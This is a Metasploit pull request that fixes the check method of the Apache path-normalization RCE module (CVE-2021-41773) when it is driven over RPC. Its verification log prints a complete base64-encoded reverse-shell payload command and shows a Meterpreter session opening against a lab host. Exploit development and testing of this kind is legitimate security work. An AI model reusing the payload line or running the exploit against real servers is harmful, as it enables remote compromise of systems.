Closed adfoster-r7 closed 2 weeks ago
Fixes a bug in apache_normalize_path_rce's check method via the RPC interface
Set up a target for RCE
https://github.com/rapid7/metasploit-framework/blob/2dce73833f6d8d458ed789a4a4b8a2a91c28bd47/documentation/modules/auxiliary/scanner/http/apache_normalize_path.md?plain=1#L24-L30
msf6 exploit(multi/http/apache_normalize_path_rce) > rerun rhost=192.168.123.1 lhost=192.168.123.1 rport=8080 ssl=false cve=CVE-2021-41773 [*] Reloading module... [*] Started reverse TCP handler on 192.168.123.1:4444 [*] Using auxiliary/scanner/http/apache_normalize_path as check [+] http://192.168.123.1:8080 - The target is vulnerable to CVE-2021-41773 (mod_cgi is enabled). [*] Scanned 1 of 1 hosts (100% complete) [*] http://192.168.123.1:8080 - Attempt to exploit for CVE-2021-41773 [*] http://192.168.123.1:8080 - Sending linux/x64/meterpreter/reverse_tcp command payload [*] http://192.168.123.1:8080 - Generated command payload: echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoewFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g== | base64 -d > /tmp/SzoTkiR; chmod +x /tmp/SzoTkiR; /tmp/SzoTkiR; rm -f /tmp/SzoTkiR [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 192.168.123.1 [*] Meterpreter session 12 opened (192.168.123.1:4444 -> 192.168.123.1:49301) at 2024-05-01 20:06:43 +0100
Ensure the module works via RPC (i.e. Metasploit Pro)
Check method failed, because the CHECK_RCE method wasn't defaulted correctly for the CheckModule method to work
CHECK_RCE
CheckModule
Session opened
This fixes an issue in the exploit/multi/http/apache_normalize_path_rce exploit module that affected Metasploit Pro due to how the module was handling datastore options.
Fixes a bug in apache_normalize_path_rce's check method via the RPC interface
Verification
Set up a target for RCE
https://github.com/rapid7/metasploit-framework/blob/2dce73833f6d8d458ed789a4a4b8a2a91c28bd47/documentation/modules/auxiliary/scanner/http/apache_normalize_path.md?plain=1#L24-L30
Ensure the module works via RPC (i.e. Metasploit Pro)
Before
Check method failed, because the
CHECK_RCE
method wasn't defaulted correctly for theCheckModule
method to workAfter
Session opened